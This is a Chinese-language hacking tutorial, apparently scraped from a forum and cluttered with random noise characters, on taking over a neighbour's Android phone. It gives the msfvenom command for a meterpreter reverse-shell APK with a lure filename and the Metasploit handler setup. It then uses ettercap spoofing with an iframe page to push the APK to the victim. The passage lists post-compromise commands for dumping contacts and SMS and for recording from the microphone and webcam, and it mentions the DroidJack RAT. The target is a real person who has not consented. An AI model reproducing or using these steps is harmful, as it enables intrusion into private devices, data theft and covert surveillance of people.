6 X2 V: S2 i" @% s$ T
五、msf+ettercap入侵邻居安卓手机 & k( r" Z: F- R5 {9 D) \
. G, z" E* x" d& H( [. m/ z5 x$ w$ W) R% l
首先启动msf
+ k1 ^4 e" g& p$ h$ p
8 U7 J% n- E# o4 [) }% N7 J
3 I$ g! @6 L7 J: m$ a% B5 Z 先用kali生成一个安卓木马,如下命令:
* W$ d+ q( `& S t; I; L" _
2 S4 T' q# L# |4 N' _& f
- `; x# r0 \0 j+ X4 U Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
; H* X9 h9 d2 p
; x3 }0 F6 d+ k& u4 J# m2 V: B7 A% }: \: s2 L% W
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
O( P/ Z I5 p) Z 3 _+ R8 o* x: v4 x( q% P6 { W
6 u/ I3 g/ _1 V( @* D5 r9 E, K
然后进入msf $ E8 U v# f- y$ U" n1 s l; Y
* n6 |$ Z$ Q% c C3 v4 O6 `" d# w' J |4 z% Z5 l
use exploit/multi/handler 5 {3 E& _ {8 m0 n) X- U& q
* _6 f' D/ H7 N
3 W/ n* A. M3 ^, x9 K set payload android/meterpreter/reverse_tcp
- I: i/ c* l3 }: t% A 5 A; V; L: d2 U) L$ p% }, Y
9 p( u* t' n' j& G set LHOST 192.168.0.109 //ip为kaili的ip
# y( @, p* V: z" q + ?7 L6 Z0 Q5 G3 Q4 E- ]9 b
7 h+ E6 I- v4 n! Z& k- i0 n" j
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ) x! C8 s/ H7 t1 N
& Q2 t* ~- x+ Y6 g6 s8 u0 Q* X
6 l0 d% c3 `1 w0 ~7 G1 X
Exploit T. \" P8 o% L/ \4 ]2 A6 B
& n9 g. X$ {) w' L; A% |1 v9 Q/ _6 w
, P2 K+ q2 R$ s' G# Z
/ ]9 {0 N. u! H8 f+ Z2 u
* N2 V) i( Q2 U! k% g2 F! `& `/ w) ~7 J N5 G7 N& L
下面我们开启ettercap -G
! L% b7 \- Z2 ]
( Q. g- \$ _0 G0 \* L5 g' B( p& ~, C; O) s
我物理IP为
9 x% m8 B5 b" D W/ e . U. L1 N0 `# G& t& K
. Q2 k0 ]2 v5 l7 @- b
4 {+ D9 I. }: a: L1 m( ^
4 r0 g1 a1 s1 A5 j0 C% f1 m! L
0 L# P$ r, `) _7 q" \ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
: n' S# R | \
8 g, X, Y# q- U& b% H7 ^" C4 [5 ^9 `% n6 B5 Q2 X, x" k( F) C
下面我们来设置一下 0 I4 f; J0 V# m; c$ [, @2 _; l' }: m
; ?6 p3 V3 r4 w6 ?, E/ R& T/ S7 c7 c1 F
3 c4 ? m I% ^ ~; D 5 d1 M2 P& `6 w G7 H1 S0 [
; I7 g p" C$ K 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
, H4 ^( A4 |6 z : _/ t4 j k, k& L' M; J
4 C O6 o) `/ F4 ^3 M3 y 6 ~9 c- s9 G( Z \
9 S0 U7 r- G: j) \& q8 E$ E( \5 {( K+ @- L& L I$ S
! H0 I0 \/ G; ?5 f U, h
$ ^" Q& {0 b# N/ U* x5 E! @, Y2 e2 F3 S
8 P7 H, V/ j* g
; {6 m* ~0 d& V) e/ k/ j8 E' b+ \9 T
, a7 ?8 Q5 j; c* D
! }4 O' S* m; E+ r" w# V: I! N
4 q# _ K/ {2 X+ U& D$ F4 P $ R' G2 o# w- C" Y7 |* e8 _
- N0 j4 j( e/ D! X R 9 g* }2 Y& p$ J8 h% ]1 |
9 G" m w9 s1 ^
7 ^* F6 u/ k# M) e5 `" G( C0 q; | # \) R0 O. ^6 ?! `5 H
0 u- R ^ |! |6 [7 U& X
( l( w+ R7 N7 P3 y% E. ] " F5 T; x& L# ~8 {7 v
/ d( D4 T0 g0 l+ M
5 u, W+ {+ D8 X
g% Z) s% ^. Y$ [" v8 A* F9 ~5 }
7 J( w0 v% z; d3 u1 R; Z1 b. \8 \% A0 i+ R
7 [3 c' p' \5 H" [1 o9 h5 c" i/ t 6 z P1 P0 f) R9 h/ |
) \& `$ f+ ]0 R# V - h" S2 J ?2 v' A8 ?+ Z8 `( o; E
0 E0 v: n/ f8 K
5 }# o* T) J( Z I4 q9 ]9 k0 J
! Z& T, u3 i; v s( Q9 L' h4 M
4 N3 D! E9 T3 d* ` # O4 W5 I, f+ X
: \. m0 Y! K( ^4 g$ e
" W- h, ~: K8 A' p
下面我们开始攻击 / c* c5 B! k6 ]& I
7 s/ [8 h, w# }, q% T0 N, V2 H! M9 t! A( |) b5 V7 ]8 _
/ I, E- W/ E, r' G2 Q4 t! i2 ?
8 [7 X5 b. S# |; ]# |
4 ]$ ?3 i. @/ d0 ] ?0 l
# y" [9 f+ d8 u7 W
! z" u$ z" w1 }- |6 `1 t
" m3 L7 p w. W" H
8 L- U9 W2 T7 D* @' z" w' A 0 S8 w* ]2 _8 w# h% E
0 V T0 Y) A- p9 T
: w' }" n* O/ I( {) l/ p ( o. V6 M* a1 d& B- j
c1 \/ E4 `% {& S0 L$ U% u
" G3 G# P0 L0 t. {) c . y0 Y2 \( [. A+ c/ I6 w* P
! [, R% e8 ~! _0 m2 H1 J2 M
大概过了5分钟多,发现反弹成功了
' l, R" q7 H7 R9 T. ^ & n$ h" M( k; K# f; r1 A
1 y- M5 F" E) w' C & a9 M& O( q: f& e
; |- Y( ]9 E* g
# U; S, @! [3 y# ]
' X1 i3 J3 n" |" L r; M8 V0 u6 n
$ D- i- l) Z; [7 q0 `
& J' W+ Z S# l9 [
& k( n M% P2 d" d0 ^
. P$ U, [- Q8 A" \. K: g
/ e7 }% H. R# F, R6 K8 R7 d
; h9 z# t& G- y* f9 c- x: ~ 3 L- b+ a( l7 H: u: c3 J
0 B( p! A, O! s- J ; J0 w( Q& J- L' y! l$ u: X/ \
( N) o, j5 K b2 z: g8 G, r3 ]
# y) E D$ ~/ y' V4 l$ \; @
" w3 h/ z, N8 Z/ g. i
+ F$ i2 S0 _- Q2 H# M. ^) g. B0 R* G! \" D7 ]
4 t" Z& k* m) b( A$ _6 R & ? x2 ]% ?: t: R5 u
3 u& Q- }( V1 g' C6 V 执行命令 / U4 Y, d2 N$ k. F) n0 Y T% Q
/ V2 t$ I) d. m& f
8 `8 o$ n; ^. N1 O
6 l: S, t8 i2 `# l% y# \- m
' K# C4 \+ {7 y$ r) ^& z4 m7 J; I
$ E& H6 o; L/ L" z8 n dump_contacts --》这个是导出电话
7 k M+ O: }& H' I8 _
6 W: Y4 t- d4 i. R0 r
0 X1 H: _! M8 u6 r dump_sms --》这个是导出信息
% n3 Z; [" |: L; {( n4 ~6 [" c* F
* V5 g4 _' l& ~( p, @4 n7 o
. y% R( S- ]# r/ I record_mic Record audio from the default microphone for X seconds # ]0 @5 T7 ]0 N- S% k; ?' m
8 F8 r' d0 ~" `9 Q# e/ g7 }- l3 r) R$ p
webcam_chat Start a video chat
0 V2 }* a& ?" ^4 g6 l. y0 W! E+ E v
9 c' I. g8 c: E
$ }5 L$ R, b2 Z! l. ]( v+ _% N. R webcam_list List webcams 0 p' _0 n, b4 t9 x5 s. ~
4 G i( l: l; ]' v. m
2 ^' ], T! U6 \1 U
webcam_snap Take a snapshot from the specified webcam
3 o+ `/ o: K: T5 d4 i! Z b9 o9 O, k K! s7 q
, @' y( A( r- |+ P webcam_stream   lay a video stream from the specified webcam , c; H- R8 B$ O3 R+ ^ x
# Y+ ?2 _4 F$ `# Q y- p7 `
6 L7 V2 K1 @' t8 U# a+ [
/ w* ]' `& S. v) M# J5 v8 } ( e7 x; f' N" R6 r' u' y; k
1 a6 A' v0 m8 `2 {3 R, d9 X
+ K0 a' q, h: W
% T+ b8 [3 V; B* p7 l2 v. {2 | v1 P+ f& i0 l
我们打开看一下电话薄, 9 o: @9 k' q4 ^% K" S$ v4 j7 T
5 v& o" E) v' ]% k2 Y+ R; B `* M6 Y
' ^9 X& d$ ]! ~+ T: l" r6 f' S
7 \% o2 e* @' F0 l: U( o 1 q3 s0 K& T, e3 A( V1 V; ?9 T( L
; E) l8 o5 a/ ? g7 s! [- s, I
$ a4 Z; B5 ]1 @3 ?1 R9 M/ ^3 w
( }# v6 ^2 p& T0 O. M$ k3 z+ P. T3 |& z0 C' M
( [: `$ f/ g3 I% M1 {
# S+ [0 D2 F- M
; G& C' `4 o! N q% r) o 2 F& y% X' J( c7 {0 ]% G! M
2 D! z6 S' W2 `: y' U3 q6 J. Q0 `1 I w4 v b0 m% h- c/ g% i6 b
, d* M6 u* K# }4 ^# @8 ]
& O, C0 _0 t, T: R
/ L' r' o; M+ \ a
1 \% A J. `& r$ T! I
8 x+ H4 c0 A/ z; {! K
7 }) \* p% U1 u0 z" V4 ]1 K 我们同时欺骗成DroidJack木马,使用方法如图:
& u% E& o D7 O+ y7 Q7 v$ @
9 Z/ m5 S/ h) z4 K1 W, P+ v' O$ x
- `9 V, L1 Y9 {4 |, V+ Y: d, E : K3 q2 s' ^6 J. C( R& K
8 e8 X, l ~" q9 l
- k; ~2 Q, B8 K9 Z) Z, r: u
9 M) n+ \3 {( B; l0 a4 r" E 1 q4 c% ~4 r. L' O# u
% c! l$ [* ^+ z
$ m. y$ B+ y8 p8 M) u; K " C( J7 F3 M4 e+ L* l
/ ?4 r4 A0 `0 m% u8 N& R3 N6 J 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 / Z! `& G5 J9 ]' m) \' b
% t6 q5 g' Z4 w, q I
2 @( o" `( g: U$ a, J # z- q$ s9 N1 p
0 p: I. y; V9 d" p
' ]* o. N' I, s3 d3 ?) }) B& ?' Z 5 |, V* n4 u7 @6 ]$ h+ P/ j
! k- M! a. w8 M% B, K" k. `, E
% l0 E& \8 R+ P7 B& K' I# i- L0 L: _9 N 3 `) ^4 f* l/ `( W+ I# [
; m7 G1 n* \4 D2 r
2 |% ~) G% B( X' P 
( v& L' m+ I6 F* z- h# x
4 |! R4 \3 `' w4 a% @
' h8 k# j Z, h
5 y F2 }" H# N. M |